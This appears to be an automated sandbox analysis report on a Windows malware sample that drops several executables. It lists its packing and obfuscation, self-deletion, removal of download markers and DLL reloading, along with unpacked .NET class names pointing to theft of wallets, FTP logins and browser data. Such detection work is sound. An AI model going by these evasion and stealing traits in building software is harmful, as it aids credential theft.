Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb7] source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: #cC:\zan\cesibevu.pdb source: 610B.exe.5.dr
Source: Binary string: C:\zan\cesibevu.pdb source: 610B.exe.5.dr
Source: Binary string: %C:\feze\liyixira.pdbp+@` source: 9D57.exe.5.dr

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Unpacked PE file: 19.2.59B4.exe.40000.0.unpack :ER; :R; :R;.idata:W;~\1847:R;.themida:EW;.boot:ER;~\1847:ER;~\1847:ER;.rsrc:R; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Unpacked PE file: 23.2.9D57.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\argjvbv Unpacked PE file: 32.2.argjvbv.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
.NET source code contains method to dynamically call methods (often used by packers)
Source: 19.2.59B4.exe.40000.0.unpack, bY6SuEh351L7GYyy67/NuxyqR8Fr0rqvtxOeE.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_004025F7 pushad ; iretd 1_2_004025FA
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_2_004029A6 push eax; ret 1_2_004029AE
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_1_004025F7 pushad ; iretd 1_1_004025FA
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 1_1_004029A6 push eax; ret 1_1_004029AE
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 10_2_02BD2D97 pushad ; iretd 10_2_02BD2D9A
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 10_2_02BD3146 push eax; ret 10_2_02BD314E
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_004025F7 pushad ; iretd 11_2_004025FA
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 11_2_004029A6 push eax; ret 11_2_004029AE
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 12_2_02E228EC push ebp; ret 12_2_02E228ED
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 12_2_02E1DCF4 pushad ; iretd 12_2_02E1DD04
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 12_2_02E223C9 push edi; ret 12_2_02E223F2
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_004025F7 pushad ; iretd 13_2_004025FA
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_2_004029A6 push eax; ret 13_2_004029AE
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_1_004025F7 pushad ; iretd 13_1_004025FA
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C5477 push ss; retf 20_2_013C547A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D29D0D1 push ecx; ret 23_2_6D29D0E4
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 24_2_0302AEA3 push eax; mov dword ptr [esp], ecx 24_2_0302AEE1
Source: C:\Users\user\AppData\Local\Temp\610B.exe Code function: 27_2_023240FA push esp; iretd 27_2_023240F9
Source: C:\Users\user\AppData\Local\Temp\610B.exe Code function: 27_2_023240C0 push esp; iretd 27_2_023240F9
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_0040B550 push eax; ret 28_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_0040B550 push eax; ret 28_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_0040B50D push ecx; ret 28_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538740B push 04000A5Eh; iretd 29_2_05387421
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Code function: 29_2_0538E89F push 5D5F5E5Bh; retn 0008h 29_2_0538E855
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 0_2_00422950 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00422950
Binary contains a suspicious time stamp
Source: 82DC.exe.5.dr Static PE information: 0x9AFA11B8 [Thu May 23 12:23:20 2052 UTC]
PE file contains sections with non-standard names
Source: 59B4.exe.5.dr Static PE information: section name:
Source: 59B4.exe.5.dr Static PE information: section name:
Source: 59B4.exe.5.dr Static PE information: section name:
Source: 59B4.exe.5.dr Static PE information: section name: ~\1847
Source: 59B4.exe.5.dr Static PE information: section name: .themida
Source: 59B4.exe.5.dr Static PE information: section name: .boot
Source: 59B4.exe.5.dr Static PE information: section name: ~\1847
Source: 59B4.exe.5.dr Static PE information: section name: ~\1847
Source: 8039.exe.5.dr Static PE information: section name: )EWhgNF
Source: 8039.exe.5.dr Static PE information: section name:
Source: 1105.tmp.23.dr Static PE information: section name: RT
Source: 1105.tmp.23.dr Static PE information: section name: .mrdata
Source: 1105.tmp.23.dr Static PE information: section name: .00cfg
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: 82DC.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x717cf
Source: B8B0.exe.5.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 8039.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x5572f
Source: initial sample Static PE information: section name: .text entropy: 7.02904343285
Source: initial sample Static PE information: section name: .text entropy: 7.39596175365
Source: initial sample Static PE information: section name: .text entropy: 7.02904343285
Source: initial sample Static PE information: section name: entropy: 7.98187641593
Source: initial sample Static PE information: section name: ~\1847 entropy: 7.4060671369
Source: initial sample Static PE information: section name: ~\1847 entropy: 7.38192824879
Source: initial sample Static PE information: section name: )EWhgNF entropy: 7.99933844083
Source: initial sample Static PE information: section name: .text entropy: 7.44496634021
Source: initial sample Static PE information: section name: .text entropy: 7.44496634021
Source: initial sample Static PE information: section name: .text entropy: 7.02904343285
Source: initial sample Static PE information: section name: .text entropy: 6.85305507137
Source: 19.2.59B4.exe.40000.0.unpack, Chr_0_M_e.cs High entropy of concatenated method names: 'S??n', 'yLR2CB83g', 'uaHHnxvaJ', 'x5NfWxYMt', 'iPHRHIBDL', 'PJamWpavP', 'MakeTries', 'WwGlOUpyL', 'L3Na8j3OvGf3qUQsvT', 'IUhPNsYBvgJsFQ9xe6'
Source: 19.2.59B4.exe.40000.0.unpack, g_E_c_?_0.cs High entropy of concatenated method names: 'TryFind', 'z8c38TDN6', 'GeckoRoamingName', 'GeckoLocalName', 'htZ9aouKySbrBsfnMn', 'AAOG0teuuPPr3F7sY4', 'fNHnD2SFbk59jJ0uL0', 'TelJUjP6c3PymR2PfZ', 'V6owyJiNRaeobHuqkU', 'yIWUMSld7ox4Hr12sc'
Source: 19.2.59B4.exe.40000.0.unpack, FileZilla.cs High entropy of concatenated method names: 'Scan', 'oxwYX7qGG', 'iVI9SREXJ', '.ctor', 'fimbor5IbSMsdptfA3', 'vr3sq0t03bJcGhR9uS', 'e7SBPZpahQ4PX4VMQX', 'CLnusRDYfyq3ws8b6w', 'c3qopEwFnsVlHY6aFb', 'QqpehZcjCTwNBrrQfp'
Source: 19.2.59B4.exe.40000.0.unpack, DownloadAndExecuteUpdate.cs High entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'ARN3DYjKI82DJ2tU5qp', 'VQxSCMjWKVEDqDVVXjX', 'pEig87jrhFh2HOwhHcT', 'DnmBptjgkx0fNVKCpDh', 'GpXAhSjfhCYu0ijpLaO', 'RydDAHjFChayEoKWhxf', 'RNnOj4jJOxDMeo4O5D8'
Source: 19.2.59B4.exe.40000.0.unpack, CryptoHelper.cs High entropy of concatenated method names: 'DecryptBlob', 'DecryptBlob', 'GetMd5Hash', 'hwG6Rwca7', 'BVxXuizOIRlmEapKHi', 'Oj8ePBX4K8fpxsjpOnx', 'J9NKn1QpiI3af6qA7r', 'MwyFLvkQjEiqUVyWIs', 'INhGBfXXbLRtbXUU77t'
Source: 19.2.59B4.exe.40000.0.unpack, CryptoProvider.cs High entropy of concatenated method names: '.ctor', 'Finalize', 'xfZxhKZfy', 'BCryptOpenAlgorithmProvider', 'BCryptCloseAlgorithmProvider', 'BCryptDecrypt', 'BCryptDestroyKey', 'BCryptGetProperty', 'BCryptSetAlgorithmProperty', 'BCryptImportKey'
Source: 19.2.59B4.exe.40000.0.unpack, StringDecrypt.cs High entropy of concatenated method names: 'Xor', 'oeH7I38wd', 'enwdeJfeD', 'Decrypt', 'rG2VqmXqgW8P6fLKH3n', 'W9N20gX6p5ubTck0KGH', 'sPTurwX3kOmu9q05jnT', 'lBODngXj5SMOsof8wqO', 'snWaVZXBiD0doqdmcaq', 'kTBcoQXYL6vlycyh5sm'
Source: 19.2.59B4.exe.40000.0.unpack, AllWallets.cs High entropy of concatenated method names: 'GetFolder', 'GetScanArgs', '.ctor', 'Ip24MoLK1jL3AZ1eRBm', 'elgKq1LW6OhwTrEqpoW', 'ueR6oqLr9mDY7JGXgBT', 'RuiauiLgst8eRvkb5O8', 'fKt8ZCLfevOsbHPmWbj', 'BttNm9LsWXwuDeONXhB', 'SXwn95LUo1LAEyfradx'
Source: 19.2.59B4.exe.40000.0.unpack, FullInfoSender.cs High entropy of concatenated method names: '.ctor', 'Send', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234'
Source: 19.2.59B4.exe.40000.0.unpack, IK64qmPWsTBxjgIB1C/vXrS0guBSgiuhbjg3O.cs High entropy of concatenated method names: 'lHCRjNXwo5', 'CDKRDNRnIS', 'rmSReShpCY', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X1Isg1quiUWHuMD5BP', 'gjicgBlqhRm4XbsKPp', 'GRYp38iTtrkcyyoiEq', 'mLMUIvR5YosgulHg3r'
Source: 19.2.59B4.exe.40000.0.unpack, ALq6dKKjQlrsYooCWs/HiXmaQw0PKZERoqU1b.cs High entropy of concatenated method names: 'OxxaUNqzmjYZ5', '.ctor', '.cctor', 'tnBNmfbC4F3SphDLwGm', 'drcVv5b9TNb8C40JNUL', 's1lHDOb5uoVZJ4AynlC', 'jRulXnbtU0unU57kuVP', 'LfajKpbaqYtuMY9JiFQ', 'F9YssQb18CiwDxxDHMa'
Source: 19.2.59B4.exe.40000.0.unpack, bY6SuEh351L7GYyy67/NuxyqR8Fr0rqvtxOeE.cs High entropy of concatenated method names: '.cctor', 'o5kaUNqs9Lvi8', 'AIZfs7lnq4', 'G7Zf1yBAxs', 'suDfxgF2tF', 'rSnfLxFOgR', 'h24fZPht0K', 'biSf6qn22C', 'GL5f7WutR0', 'zBPfdqlYap'
Source: 19.2.59B4.exe.40000.0.unpack, IPv4Helper.cs High entropy of concatenated method names: 'pa1eXNhev', 'GetDefaultIPv4Address', 'Lpsk6RcDj', 'Yug89nB2b1VSEE5Y4FC', 'B1iqYZBs0H70uYe695v', 'UGGmJHBHjs9aIJCom5N', 'CT7k3CBM9Xs9fXuCrSA', 'WQJC7rBUh9MBveTFqUw', 'iLkuDZBKnJMxKx4sfcb', 'rxZ9OsBWEiEq3Ud3Uwq'
Source: 19.2.59B4.exe.40000.0.unpack, GdiHelper.cs High entropy of concatenated method names: 'kK2jJR2mk', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'GetImageBase', 'sduDK4krH', 'hZvJLQB0hXUdkIGifKM', 'H3SRm3BVjVFuHcnKnhR', 'gFkNOoBisK7AqSx0kZn', 'hvmugjBAOPSi9le4Nbm', 'Mtc3KgBh6RB4CPUN4UU'
Source: 19.2.59B4.exe.40000.0.unpack, DbContext.cs High entropy of concatenated method names: 'get_RowLength', '.ctor', 'GatherValue', 'ReadContextValue', 'Count', 'p8DAFdQhd', 'QakwmuNp5', 'ReadContextTable', 'fftKfYYRr', 'DuUXwP6LA'
Source: 19.2.59B4.exe.40000.0.unpack, SystemInfoHelper.cs High entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetVs', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
Source: 19.2.59B4.exe.40000.0.unpack, Extensions.cs High entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'ChangeType', 'StripQuotes', 'DomainExists', 'PreCheck', 'IexbVVBaObgQlpl4mqq', 'hjb1UfB1UcxxQ7Jiwxt', 'hZ8UD8BCWHIy5f3AywH', 'WFv76jB906BEpUUFgPu'
Source: 19.2.59B4.exe.40000.0.unpack, DesktopMessanger.cs High entropy of concatenated method names: 'get_PassedPaths', 'set_PassedPaths', 'GetFolder', 'GetScanArgs', '.ctor', 'EC1LrFjXBQ97Je8oK2p', 'F7YfBIjLM6gE7RBhT6P', 'SI2wcMjjw8baG3k3RT0', 'e4U4OqjBoXX6TVU2EV9', 'isENaYjqM8hbVKViC6G'
Source: 19.2.59B4.exe.40000.0.unpack, BrEx.cs High entropy of concatenated method names: 'Init', '.ctor', 'GetFolder', 'GetScanArgs', 'zEtq89Lx7ejD3dh7YWe', 'OIhWfJLdXoRBYT98uEt', 'jTPrBRLIuqlhW6a7Kr9', 'm7bJrYLQscKkO93gFCI', 'cmTe8wLJ164fRFRVPOp', 'SUUeM2LGbp361k3SdTl'

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\argjvbv Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\hrgjvbv Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\82DC.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8039.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F72D.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\argjvbv Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\hrgjvbv Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9D57.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9D57.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe File created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B8B0.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\59B4.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\610B.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 28_2_00401306

Hooking and other Techniques for Hiding and Protection:

barindex
DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\y4omrto1mt.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\hrgjvbv:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_00408E31
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
